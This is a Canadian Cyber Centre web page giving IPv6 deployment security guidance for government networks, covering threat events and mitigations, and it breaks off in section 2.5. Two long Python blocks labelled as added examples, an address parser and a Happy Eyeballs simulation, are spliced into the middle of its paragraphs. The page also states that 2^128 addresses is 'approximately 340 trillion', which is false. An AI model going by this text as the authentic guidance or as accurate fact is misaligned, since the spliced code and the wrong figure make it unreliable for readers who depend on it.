architecture</a></li> <li><a href="#2.4">2.4 Legacy applications</a></li> <li><a href="#2.5">2.5 Unauthorized tunnels</a></li> <li><a href="#2.6">2.6 Default configurations</a></li> <li><a href="#2.7">2.7 Unauthorized IPv6 traffic flows</a></li> <li><a href="#2.8">2.8 Monitoring and management tools</a></li> <li><a href="#2.9">2.9 Addressing scheme</a></li> <li><a href="#2.10">2.10 Multi-addressing support</a></li> <li><a href="#2.11">2.11 Dynamic Host Configuration Protocol for IPv6</a></li> <li><a href="#2.12">2.12 Address autoconfiguration protections</a></li> <li><a href="#2.13">2.13 Dual-stack environments</a></li> <li><a href="#2.14">2.14 Protection of data and management planes</a></li> <li><a href="#2.15">2.15 Neighbor discovery messages</a></li> <li><a href="#2.16">2.16 Address translation risks</a></li> <li><a href="#2.17">2.17 Zero trust architecture</a></li> <li><a href="#2.18">2.18 Technical and operational depth</a></li> </ul></li> <li><a href="#3">3 Conclusion</a></li> <li><a href="#reference">Reference</a></li> </ul></details></section><section><h2 class="mrgn-tp-xl text-info">Overview</h2> <p>Exponential growth in the use of Internet-based technologies to deliver modern business services and applications is linked to the depletion of globally available Internet Protocol version 4 (IPv4) addresses. The Internet Protocol version 6 (IPv6) addressing scheme was designed by the Internet Engineering Task Force (IETF) to replace <abbr title="Internet Protocol version 4">IPv4</abbr>, and it offers significantly larger private and public address blocks to adequately support modern enterprise and non-enterprise needs. Deploying <abbr title="Internet Protocol version 6">IPv6</abbr> endpoints alongside existing <abbr title="Internet Protocol version 4">IPv4</abbr> infrastructure is emerging as a common strategy within enterprise networks. 
While <abbr title="Internet Protocol version 6">IPv6</abbr> offers several security enhancements that <abbr title="Internet Protocol version 4">IPv4</abbr> does not, running dual-stack architectures introduces new risks that must be appropriately managed.</p> <p>To ensure its service architecture continues to evolve, the Government of Canada (GC) will need to design new network architectures and migrate existing digital infrastructure to support <abbr title="Internet Protocol version 6">IPv6</abbr>. As part of this strategy, <abbr title="Internet Protocol version 6">IPv6</abbr>-enabled services must be designed to securely co-exist alongside existing <abbr title="Internet Protocol version 4">IPv4</abbr> infrastructure until an <abbr title="Internet Protocol version 6">IPv6</abbr>-only enterprise architecture emerges. While introducing <abbr title="Internet Protocol version 6">IPv6</abbr> within GC infrastructure may have little or no direct impact on users and front-end services, GC departments must examine and assess the implications of <abbr title="Internet Protocol version 6">IPv6</abbr> on their business services and security objectives.</p> <p>This publication highlights critical security considerations for <abbr title="Internet Protocol version 6">IPv6</abbr> deployments within GC networks. GC departments must design transition plans to support <abbr title="Internet Protocol version 6">IPv6</abbr> addressing while ensuring operational and security risks are mitigated.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h2 class="mrgn-tp-xl text-info" id="1">1 Introduction</h2> <p>The GC relies on digital, inter-networked systems for delivering essential services to Canadians. 
Networking technologies continuously evolve due to the requirements of the digital infrastructure needed to support modern service connectivity. While the average Canadian user may not understand which Internet Protocol (IP) stack supports their services, the expectation is that GC digital service infrastructure should be able to process service requests from <abbr title="Internet Protocol version 6">IPv6</abbr>-enabled or <abbr title="Internet Protocol version 4">IPv4</abbr>-enabled devices. As GC networks and services are built to support the <abbr title="Internet Protocol version 6">IPv6</abbr> technology stack, key stakeholders must assess the potential risks and impact of adopting the <abbr title="Internet Protocol version 6">IPv6</abbr> protocol within the enterprise network, particularly security risks associated with implementing a dual-stack (<abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr>) architecture.</p> <p>Modern systems and applications have varying <abbr title="Internet Protocol version 6">IPv6</abbr> protocol support; sometimes the protocol is available by default while other times, vendor-unique customizations are implemented, which can lead to interoperability challenges. These can expose enterprise networks to considerable security risks, increasing the likelihood for misconfigurations and gaps in security controls.</p> <p>In 2013, <abbr title="Treasury Board of Canada Secretariat">TBS</abbr> released the <a href="https://www.tbs-sct.canada.ca/pol/doc-eng.aspx?id=26295"><abbr title="Internet Protocol version 6">IPv6</abbr> Network Equipment Procurement Guideline</a> as a follow-up to the <abbr title="Internet Protocol version 6">IPv6</abbr> Adoption Strategy. 
This guideline was meant to help GC departments understand the technical requirements when procuring network equipment (for example, routers, network monitoring devices, proxy servers, firewalls) to ensure <abbr title="Internet Protocol version 6">IPv6</abbr> capabilities are evaluated as part of system procurement processes. However, neither the strategy nor the procurement guidelines adequately address security considerations for <abbr title="Internet Protocol version 6">IPv6</abbr>.</p> <p>While sections of the existing departmental digital architecture may be capable of supporting <abbr title="Internet Protocol version 6">IPv6</abbr>, without a secured framework for implementation, security risks may be inadvertently introduced into the enterprise environment. Departments should not assume that enabling support for <abbr title="Internet Protocol version 6">IPv6</abbr> can simply occur by flipping a switch.</p> <p>According to the <abbr title="Internet Protocol version 6">IPv6</abbr> protocol specification, <abbr title="Internet Protocol version 6">IPv6</abbr> is prioritized over <abbr title="Internet Protocol version 4">IPv4</abbr> by default. Although business enterprise applications may not use the <abbr title="Internet Protocol version 6">IPv6</abbr> protocol, defined specification standards and vendor-implemented default configurations may allow communications with <abbr title="Internet Protocol version 6">IPv6</abbr> link-local addresses. For example, Microsoft<sup id="fn1-rf"><a class="fn-lnk" href="#fn1"><span class="wb-inv">Footnote </span>1</a></sup> does not recommend disabling <abbr title="Internet Protocol version 6">IPv6</abbr> support on Windows operating environments even when not in use. 
To assess these and other issues, the Cyber Centre recommends that GC departments conduct a review of <abbr title="Internet Protocol version 6">IPv6</abbr> network flows within their environment and address gaps that may exist within their network security monitoring tools before implementation. Enabling <abbr title="Internet Protocol version 6">IPv6</abbr> traffic flows without adequate network visibility monitoring or appropriate network filtering protections may increase the enterprise attack surface and expose the network to additional security risks.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="1.1">1.1 Internet Protocol version 6</h3> <p><abbr title="Internet Protocol">IP</abbr> is the primary communications protocol of the Internet; it specifies how network packets are to be transported across network boundaries. <abbr title="Internet Protocol">IP</abbr> is a component of the network layer in the Open Systems Interconnection reference model, a framework for organizing communication protocols and sharing information over the public Internet.</p> <p><abbr title="Internet Protocol version 6">IPv6</abbr> was designed to replace <abbr title="Internet Protocol version 4">IPv4</abbr>, with some enhancements in operational and security functions. Differences exist between <abbr title="Internet Protocol version 6">IPv6</abbr> and <abbr title="Internet Protocol version 4">IPv4</abbr> which have implications on network architecture designs. The <abbr title="Internet Protocol version 6">IPv6</abbr> protocol standard is a 128-bit network addressing scheme, which provides a significantly wider address space compared to <abbr title="Internet Protocol version 4">IPv4</abbr> (which uses a 32-bit network addressing scheme). 
By default, <abbr title="Internet Protocol version 6">IPv6</abbr> is not backward compatible with <abbr title="Internet Protocol version 4">IPv4</abbr>, which may require network administrators to implement changes to existing network architectures.</p> <h3 class="mrgn-tp-md">Internet Protocol version 6 compared to Internet Protocol version 4</h3> <h3>Protocol components – Address space and notation</h3> <h4>Internet Protocol version 4</h4> <ul><li>uses 32-bit address space, and therefore offers a limited address space for private and public use cases</li> <li>address notation consists of numbers separated by a period, for example, 192.168.0.1</li> </ul><h4>Internet Protocol version 6</h4> <ul><li>uses 128-bit address space, and therefore allows up to 2^128 unique network addresses (approximately 340 trillion)</li> <li>address notation consists of eight colon-separated hexadecimal values, for example, 2001:0DB8:0000:0000:0000:000A:09C0:00B4</li> </ul><h3>Protocol components – Security functions</h3> <h4>Internet Protocol version 4</h4> <ul><li>Protocol does not natively support authentication and security functions</li> </ul><h4>Internet Protocol version 6</h4> <ul><li>Natively supports authentication, data integrity, and data confidentiality (for example, IP security (IPsec) support)</li> </ul><h3>Protocol components – Types</h3> <h4>Internet Protocol version 4</h4> <ul><li>Supports public and private static addressing to manage networks; however, address space is limited</li> </ul><h4>Internet Protocol version 6</h4> <ul><li>supports public routing and private static addressing to manage network devices</li> <li>typical network address is composed of sections and identifiers (global routing prefix, local subnet identifier and interface identifier)</li> </ul><h3>Protocol components – Address distribution</h3> <h4>Internet Protocol version 4</h4> <ul><li>Autoconfiguration is not supported and would require static or Dynamic Host Configuration Protocol (DHCP) 
assignment of IP addresses</li> </ul><h4>Internet Protocol version 6</h4> <ul><li>Allows autoconfiguration (stateless address configurations), easing the need for address assignment by a DHCP server. Autoconfiguration relies on router information for network addresses to access network services</li> </ul><div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="1.2">1.2 Internet Protocol version 6 enhancements</h3> <p>The <abbr title="Internet Protocol version 6">IPv6</abbr> specification standard proposed enhancements which were not previously available in <abbr title="Internet Protocol version 4">IPv4</abbr>. The following subsections provide additional information on the security enhancements.</p> <h4 id="1.2.1">1.2.1 Internet Protocol security support</h4> <p>IPsec is a suite of protocols that can be used for authentication, encryption, and integrity protections. While IPsec can be used as a retroactive extension in <abbr title="Internet Protocol version 4">IPv4</abbr>, for <abbr title="Internet Protocol version 6">IPv6</abbr> it is supported as part of the standard. Note, IPsec is no longer mandatory in <abbr title="Internet Protocol version 6">IPv6</abbr> as per <abbr title="request for comments">RFC</abbr> 8504<sup id="fn2-rf"><a class="fn-lnk" href="#fn2"><span class="wb-inv">Footnote </span>2</a></sup>.</p> <h4 id="1.2.2">1.2.2 Autoconfiguration</h4> <p>Autoconfiguration provides the ability for a node to self-assign its <abbr title="Internet Protocol version 6">IPv6</abbr> network address based on the network prefix information advertised by the router. 
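The address structure described in section 1.1 (global routing prefix, subnet identifier, interface identifier) and the self-assigned interface identifier of section 1.2.2, as an added example that is not part of the guidance: a small Python parser that expands the eight-hextet notation, produces the RFC 5952 canonical form, splits an address into its three fields, and flags interface identifiers built from a MAC address (modified EUI-64, the original SLAAC construction), since such an address reveals the hardware address to anyone who sees it. All sample addresses are constructed from the 2001:db8::/32 documentation prefix.

```python
"""IPv6 address handling: expansion of the eight-hextet form, RFC 5952 canonical
compression, decomposition into routing prefix / subnet ID / interface ID, and a
check for SLAAC interface IDs derived from a MAC address (modified EUI-64).

Added example (not from the guidance); all sample addresses are constructed
from the 2001:db8::/32 documentation prefix."""
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import Optional

HEXTET = re.compile(r"^[0-9a-f]{1,4}$")


def expand(addr: str) -> list[int]:
    """Parse an IPv6 address (with or without '::') into eight 16-bit values."""
    addr = addr.strip().lower()
    if addr.count("::") > 1:
        raise ValueError("only one '::' is allowed")
    if "::" in addr:
        head, tail = addr.split("::")
        head_parts = head.split(":") if head else []
        tail_parts = tail.split(":") if tail else []
        missing = 8 - len(head_parts) - len(tail_parts)
        if missing < 1:
            raise ValueError("'::' must stand for at least one zero hextet")
        parts = head_parts + ["0"] * missing + tail_parts
    else:
        parts = addr.split(":")
    if len(parts) != 8 or not all(HEXTET.match(p) for p in parts):
        raise ValueError(f"malformed IPv6 address: {addr!r}")
    return [int(p, 16) for p in parts]


def compress(hextets: list[int]) -> str:
    """Canonical text form per RFC 5952: lowercase, no leading zeros, and the
    longest run of two or more zero hextets (the first run on a tie) as '::'."""
    best_start, best_len, i = -1, 0, 0
    while i < 8:
        if hextets[i] != 0:
            i += 1
            continue
        j = i
        while j < 8 and hextets[j] == 0:
            j += 1
        if j - i > best_len:
            best_start, best_len = i, j - i
        i = j
    words = [f"{h:x}" for h in hextets]
    if best_len < 2:
        return ":".join(words)
    return ":".join(words[:best_start]) + "::" + ":".join(words[best_start + best_len:])


def canonical(addr: str) -> str:
    return compress(expand(addr))


def mac_from_eui64(iid: list[int]) -> Optional[str]:
    """If the 64-bit interface ID has the modified EUI-64 shape (MAC split around
    0xfffe, universal/local bit inverted), recover the MAC. This is a shape
    check only: a randomly generated IID matches it with probability 2^-16."""
    if iid[1] & 0xFF != 0xFF or iid[2] >> 8 != 0xFE:
        return None
    octets = [iid[0] >> 8, iid[0] & 0xFF, iid[1] >> 8,
              iid[2] & 0xFF, iid[3] >> 8, iid[3] & 0xFF]
    octets[0] ^= 0x02  # undo the u/l bit inversion
    return ":".join(f"{o:02x}" for o in octets)


@dataclass(frozen=True)
class AddressParts:
    global_routing_prefix: str     # bits 0-47
    subnet_id: str                 # bits 48-63
    interface_id: str              # bits 64-127
    mac_from_eui64: Optional[str]  # set when the interface ID leaks a MAC address


def decompose(addr: str) -> AddressParts:
    """Split a global unicast address into the three fields named in section 1.1."""
    h = expand(addr)
    return AddressParts(
        global_routing_prefix=":".join(f"{x:x}" for x in h[:3]),
        subnet_id=f"{h[3]:x}",
        interface_id=":".join(f"{x:x}" for x in h[4:]),
        mac_from_eui64=mac_from_eui64(h[4:]),
    )


if __name__ == "__main__":
    for a in ("2001:0DB8:0000:0000:0000:000A:09C0:00B4",   # notation example from section 1.1
              "2001:db8:1:2:211:22ff:fe33:4455"):          # constructed SLAAC/EUI-64 address
        print(canonical(a), decompose(a))
```

Run over an inventory of observed addresses, the `mac_from_eui64` field is the audit signal: hosts whose interface identifiers are MAC-derived should be moved to temporary (RFC 4941) or stable-opaque (RFC 7217) identifiers, which modern operating systems generate by default.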
Stateless address autoconfiguration (SLAAC) is the mechanism by which this can be achieved.</p> <h4 id="1.2.3">1.2.3 Neighbor discovery</h4> <p>The neighbor discovery (ND) protocol replaces the address resolution protocol used in <abbr title="Internet Protocol version 4">IPv4</abbr> networks, providing cryptographic options to secure discovery messages.</p> <h4 id="1.2.4">1.2.4 Dynamic host configuration protocol security</h4> <p>The dynamic host configuration protocol for <abbr title="Internet Protocol version 6">IPv6</abbr> (DHCPv6) supports authentication (and encryption) of <abbr title="Dynamic Host Configuration Protocol">DHCP</abbr> messages using IPsec, thus preventing eavesdropping and message intercept attacks.</p> <h4 id="1.2.5">1.2.5 Extension headers</h4> <p><abbr title="Internet Protocol version 6">IPv6</abbr> extension headers can be used to improve security, debugging, and management functions.</p> <h4 id="1.2.6">1.2.6 No broadcast addresses</h4> <p>The <abbr title="Internet Protocol version 6">IPv6</abbr> standard abolished the use of broadcast addresses and adopted multicast addresses as the primary mechanism for group communications.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="1.3">1.3 Problem statement</h3> <p>As enterprise networks evolve, <abbr title="Internet Protocol version 6">IPv6</abbr> will inevitably need to be supported and managed. New network devices will likely support <abbr title="Internet Protocol version 6">IPv6</abbr> and have it enabled by default, prioritizing its traffic flow in line with the specification standard. 
Deploying <abbr title="Internet Protocol version 6">IPv6</abbr>-enabled devices without proper understanding, adequate monitoring, hardening, and deployment of appropriate mitigation controls will increase the enterprise attack surface and expose the organization to significant risks.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="1.4">1.4 Threat context</h3> <p>This guidance is intended for systems operating at the UNCLASSIFIED, PROTECTED A, and PROTECTED B levels. In general, the Cyber Centre recommends that GC departments and agencies conduct a threat and risk assessment within the context of their business needs before partial or full-scale adoption of <abbr title="Internet Protocol version 6">IPv6</abbr>. As organizations consider threat sources that may exploit <abbr title="Internet Protocol version 6">IPv6</abbr> vulnerabilities, the Cyber Centre assesses that unsophisticated threat actors (Td3) may target device misconfiguration errors and unintentionally exposed devices to infiltrate networks and maximize their criminal operations. Cybercrime groups and financially motivated cyber threat actors (Td4 and Td5) may target <abbr title="Internet Protocol version 6">IPv6</abbr>-related device vulnerabilities and design implementation weaknesses<sup id="fn3-rf"><a class="fn-lnk" href="#fn3"><span class="wb-inv">Footnote </span>3</a></sup>. State-sponsored actors (Td6 and above), in addition to lower-level tactics, may target IPv6 protocol specification weaknesses and system integration vulnerabilities to achieve larger strategic objectives. 
Mitigations to address state-sponsored advanced threats are considered out of scope for this guidance.</p> <p>Below are some identified potential threat events (attacks) that could be applicable within <abbr title="Internet Protocol version 6">IPv6</abbr> environments:</p> <h4 id="1.4.1">1.4.1 Protocol tunneling</h4> <p>Threat actors may encapsulate network packets within another protocol or create multiple tunnels through a network device to evade detection controls. For example, network devices may allow a malicious actor to embed unauthorized <abbr title="Internet Protocol version 6">IPv6</abbr> packets within <abbr title="Internet Protocol version 4">IPv4</abbr> tunnels to evade or bypass network filtering controls. Additionally, threat actors may launch spoofing attacks utilizing tunnel injection techniques, i.e. where a threat actor forges a valid encapsulated packet (based on partial knowledge of the tunnel endpoints and the encapsulation protocol)<sup id="fn4-rf"><a class="fn-lnk" href="#fn4"><span class="wb-inv">Footnote </span>4</a></sup>.</p> <h4 id="1.4.2">1.4.2 Distributed denial-of-service attacks</h4> <p>Threat actors may utilize <abbr title="Internet Protocol version 6">IPv6</abbr> protocol capabilities such as multicast messages or extension headers to launch distributed denial-of-service (DDoS) attacks to overwhelm network defence systems. For example, a threat actor can use spoofed <abbr title="Internet Protocol version 6">IPv6</abbr> link-layer multicast messages to launch a denial-of-service attack on a target source address.</p> <h4 id="1.4.3">1.4.3 Command and control</h4> <p>Threat actors may leverage <abbr title="Internet Protocol version 6">IPv6</abbr> enhancements (extension headers or others) to embed and communicate control signals or beacons through a compromised network. 
Globally accessible and larger address space blocks make <abbr title="Internet Protocol version 6">IPv6</abbr> attractive for threat actors to deploy command and control channels.</p> <h4 id="1.4.4">1.4.4 Network device misconfigurations</h4> <p>Threat actors may exploit network device misconfigurations or inconsistencies when perimeter gateway access control filters are not properly implemented. Threat actors may exploit network devices which expose unconfigured <abbr title="Internet Protocol version 6">IPv6</abbr> interfaces by default to bypass network security controls.</p> <h4 id="1.4.5">1.4.5 Network service discovery</h4> <p><abbr title="Internet Protocol version 6">IPv6</abbr> multicast service discovery messages (e.g. multicast DNS (mDNS)<sup id="fn5-rf"><a class="fn-lnk" href="#fn5"><span class="wb-inv">Footnote </span>5</a></sup> or Link-Local Multicast Name Resolution (LLMNR)<sup id="fn6-rf"><a class="fn-lnk" href="#fn6"><span class="wb-inv">Footnote </span>6</a></sup>) can be spoofed or crafted to redirect endpoints to an attacker-controlled infrastructure. Also, threat actors may leverage <abbr title="Internet Protocol version 6">IPv6</abbr>’s default protocol capabilities (such as Neighbor Discovery) to support reconnaissance operations (for example, extracting sensitive network device information) which can then be used to target vulnerabilities.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h2 class="mrgn-tp-xl text-info" id="2">2 Security considerations</h2> <p>The security model required for enterprise network architectures to support IPv6-enabled devices is different from traditional <abbr title="Internet Protocol version 4">IPv4</abbr> implementations. 
This section highlights cyber security considerations and recommended actions to mitigate risks associated with the use of <abbr title="Internet Protocol version 6">IPv6</abbr> within an enterprise network. <abbr title="Internet Protocol version 6">IPv6</abbr> transition plans must consider the impact on business services and the organization’s security posture.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.1">2.1 Migration risks</h3> <p>Enabling <abbr title="Internet Protocol version 6">IPv6</abbr> alters an organization’s network communications and security monitoring requirements. Accordingly, a systematic approach considering transition plans, interoperability risks and future operational requirements is highly recommended. Organizations may have both <abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr> deployed over their transition period. As such, it is crucial to consider whether existing network security infrastructures can support <abbr title="Internet Protocol version 6">IPv6</abbr>. Management must ensure that <abbr title="Internet Protocol version 6">IPv6</abbr> transition plans adhere to change management processes. Security program policies and procedures at the organization level may require updates as necessary.</p> <p>Management should identify the target objective, transition timelines, and migration paths. Security control policies that manage audit and monitoring, interconnection requirements, device identification and authentication, boundary protection, and managed interfaces may require updates. 
In general, the Cyber Centre recommends using the risk management framework detailed in <a href="https://www.cyber.gc.ca/en/guidance/it-security-risk-management-lifecycle-approach-itsg-33">IT security risk management: A lifecycle approach (ITSG-33)</a> to identify and manage related information system security risks.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.2">2.2 Procurement and testing</h3> <p><abbr title="Internet Protocol version 6">IPv6</abbr> transition and implementation plans must be aligned with the organization’s procurement strategy. Procurement of assets with networking functions should be assessed for <abbr title="Internet Protocol version 6">IPv6</abbr> support. The National Institute of Standards and Technology (NIST) and the University of New Hampshire (UNH) InterOperability Laboratory have developed an assessment and testing program that can assist with functional evaluation of <abbr title="Internet Protocol version 6">IPv6</abbr> products. This program maintains a product registry of <abbr title="Internet Protocol version 6">IPv6</abbr> devices and applications that have been tested against the technical requirements of the United States Government <abbr title="Internet Protocol version 6">IPv6</abbr> standards profile (USGv6-r1 Profile)<sup id="fn7-rf"><a class="fn-lnk" href="#fn7"><span class="wb-inv">Footnote </span>7</a></sup> for performance and conformance. The Cyber Centre recommends that organizations consider products on the <abbr title="United States Government IPv6">USGv6</abbr> program registry as part of their procurement strategy. Organizations should review a product’s Supplier Declaration of Conformity (SDoC), which documents <abbr title="Internet Protocol version 6">IPv6</abbr> capability claims. 
Additionally, organizations should test the network infrastructure’s capability to support <abbr title="Internet Protocol version 6">IPv6</abbr>-only deployment scenarios.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.3">2.3 Target architecture</h3> <p>The target architecture for the adoption of <abbr title="Internet Protocol version 6">IPv6</abbr> must fall within an acceptable level of residual risk (risk tolerance) for the organization. The Cyber Centre recommends a target architecture plan that ultimately leads to an <abbr title="Internet Protocol version 6">IPv6</abbr>-only network infrastructure end-state. While dual-stack architectures (<abbr title="Internet Protocol version 4">IPv4</abbr>/<abbr title="Internet Protocol version 6">IPv6</abbr>) might be an obvious transition choice, the Cyber Centre recommends designing the transition plan with the goal of an <abbr title="Internet Protocol version 6">IPv6</abbr>-only end-state architecture. A single-stack (<abbr title="Internet Protocol version 6">IPv6</abbr>-only) end-state architecture simplifies network management and security monitoring and reduces overall operational costs.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.4">2.4 Legacy applications</h3> <p>Legacy applications may lack native support for <abbr title="Internet Protocol version 6">IPv6</abbr>, making them incapable of processing <abbr title="Internet Protocol version 6">IPv6</abbr> packet data. This is particularly problematic for critical business applications that have no mechanism to support <abbr title="Internet Protocol version 6">IPv6</abbr>. 
When <abbr title="Internet Protocol version 6">IPv6</abbr> is enabled, legacy applications or security controls that rely on hard-coded <abbr title="Internet Protocol version 4">IPv4</abbr> addresses as hostnames may be impacted. If adequate traffic translation mechanisms are not implemented, <abbr title="Internet Protocol version 6">IPv6</abbr>-only endpoints may be prevented from connecting to services that are only <abbr title="Internet Protocol version 4">IPv4</abbr>-aware and vice-versa. The Cyber Centre recommends that organizations assess the impact of their transition plans on their software applications.</p> <p>The <a href="https://datatracker.ietf.org/doc/html/rfc8305">Happy Eyeballs Version 2: Better Connectivity Using Concurrency algorithm</a><sup id="fn8-rf"><a class="fn-lnk" href="#fn8"><span class="wb-inv">Footnote </span>8</a></sup> is an <abbr title="Internet Engineering Task Force">IETF</abbr>-proposed standard for managing how system applications can initiate and process asynchronous Domain Name System (DNS) queries on dual-stack hosts. The algorithm allows web applications to switch seamlessly between <abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr> networks. Network administrators should therefore test business applications for <abbr title="Internet Protocol version 6">IPv6</abbr>-based capabilities. While the Happy Eyeballs algorithm offers the benefit of managing switches between <abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr>, it may also mask network problems. 
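How the Happy Eyeballs race can hide a broken path, as an added example that is not code from the guidance or from RFC 8305. The Python simulation below assumes DNS resolution has already returned the AAAA and A answer lists, uses constructed per-address handshake timings instead of real sockets, and scales the RFC's 250 ms connection attempt delay down tenfold. The point of the example is the `failures` and `abandoned` record: an IPv6 outage is visible there even though the application connected successfully over IPv4.

```python
"""Happy Eyeballs v2 (RFC 8305) connection racing on a dual-stack host,
simulated offline, with the non-winning attempts kept visible.

Added example, not code from the guidance or the RFC: DNS resolution is assumed
already complete (AAAA and A answers are passed in), handshake times are
constructed, no sockets are opened, and the RFC's 250 ms delay is scaled down 10x."""
from __future__ import annotations
import asyncio
from dataclasses import dataclass, field
from typing import Awaitable, Callable

ATTEMPT_DELAY = 0.025  # RFC 8305 "Connection Attempt Delay" default is 250 ms

Connect = Callable[[str], Awaitable[None]]


@dataclass
class Outcome:
    winner: str | None = None
    failures: list[str] = field(default_factory=list)   # attempts that errored
    abandoned: list[str] = field(default_factory=list)  # cancelled or unused once a winner existed


def interleave(aaaa: list[str], a: list[str]) -> list[str]:
    """RFC 8305 section 4: alternate address families, IPv6 first, so that one
    broken family cannot hold up the whole connection."""
    order: list[str] = []
    for pair in zip(aaaa, a):
        order.extend(pair)
    n = min(len(aaaa), len(a))
    order.extend(aaaa[n:] or a[n:])
    return order


async def _attempt(addr: str, connect: Connect, outcome: Outcome) -> None:
    try:
        await connect(addr)
    except ConnectionError as exc:
        outcome.failures.append(f"{addr}: {exc}")
        return
    if outcome.winner is None:
        outcome.winner = addr
    else:
        outcome.abandoned.append(addr)  # handshake finished, but another attempt won first


async def happy_eyeballs(candidates: list[str], connect: Connect) -> Outcome:
    """Start one attempt per candidate, each ATTEMPT_DELAY after the previous
    (sooner if the previous one fails). The first completed handshake wins and
    the rest are cancelled. Losing attempts are recorded rather than dropped:
    that record is the visibility the algorithm otherwise takes from operators."""
    outcome = Outcome()
    running: dict[asyncio.Task, str] = {}
    queue = list(candidates)
    while outcome.winner is None and (queue or running):
        if queue:
            addr = queue.pop(0)
            running[asyncio.create_task(_attempt(addr, connect, outcome))] = addr
        done, _ = await asyncio.wait(set(running), timeout=ATTEMPT_DELAY if queue else None,
                                     return_when=asyncio.FIRST_COMPLETED)
        for task in done:
            running.pop(task)
    for task, addr in running.items():
        task.cancel()
        outcome.abandoned.append(addr)
    if running:
        await asyncio.gather(*running, return_exceptions=True)
    return outcome


def simulated_connect(paths: dict[str, float | None | ConnectionError]) -> Connect:
    """Fake connect(): a float is the handshake time in seconds, None models a
    black-holed path (SYN never answered, the classic broken-IPv6 symptom), and a
    ConnectionError is raised immediately (for example, connection refused)."""
    async def connect(addr: str) -> None:
        path = paths[addr]
        if isinstance(path, ConnectionError):
            raise path
        if path is None:
            await asyncio.sleep(40 * ATTEMPT_DELAY)  # stands in for the OS connect timeout
            raise ConnectionError("connect timed out")
        await asyncio.sleep(path)
    return connect


def dial(aaaa: list[str], a: list[str], paths) -> Outcome:
    return asyncio.run(happy_eyeballs(interleave(aaaa, a), simulated_connect(paths)))


if __name__ == "__main__":
    # Constructed scenario: the IPv6 path is black-holed, IPv4 works. The
    # application connects fine; only the abandoned list shows IPv6 is broken.
    print(dial(["2001:db8::10"], ["192.0.2.10"], {"2001:db8::10": None, "192.0.2.10": 0.01}))
```

In the black-hole scenario the caller gets a working IPv4 connection after roughly one attempt delay, which is exactly why a successful application test says nothing about the health of the IPv6 path; treating every entry in `abandoned` and `failures` as a metric to alert on is the practical counterpart of the caveat above.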
Hence, successfully connecting to an application may not be an indication of a clean bill of health on the <abbr title="Internet Protocol version 4">IPv4</abbr> or <abbr title="Internet Protocol version 6">IPv6</abbr> networks in a dual-stack environment.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="2.5">2.5 Unauthorized tunnels</h3> <p>Organizations should implement network security controls to detect and block the use of unauthorized <abbr title="Internet Protocol version 6">IPv6</abbr> transition tunnels. Transition tunnels are techniques used to transport <abbr title="Internet Protocol version 6">IPv6</abbr> packets over <abbr title="Internet Protocol version 4">IPv4</abbr> network infrastructure. <abbr title="Internet Protocol version 6">IPv6</abbr> tunnels can be manual or automatic tunnels, such as those provided by Teredo, 6to4<sup id="fn9-rf"><a class="fn-lnk" href="#fn9"><span class="wb-inv">Footnote </span>9</a></sup>, or Intra-Site Automatic Tunnel Addressing Protocol (ISATAP)<sup id="fn10-rf"><a class="fn-lnk" href="#fn10"><span class="wb-inv">Footnote </span>10</a></sup>. Teredo is an automatic tunneling protocol designed by Microsoft, and it uses User Datagram Protocol (UDP) to tunnel <abbr title="Internet Protocol version 6">IPv6</abbr> packets over <abbr title="Internet Protocol version 4">IPv4</abbr> networks. 
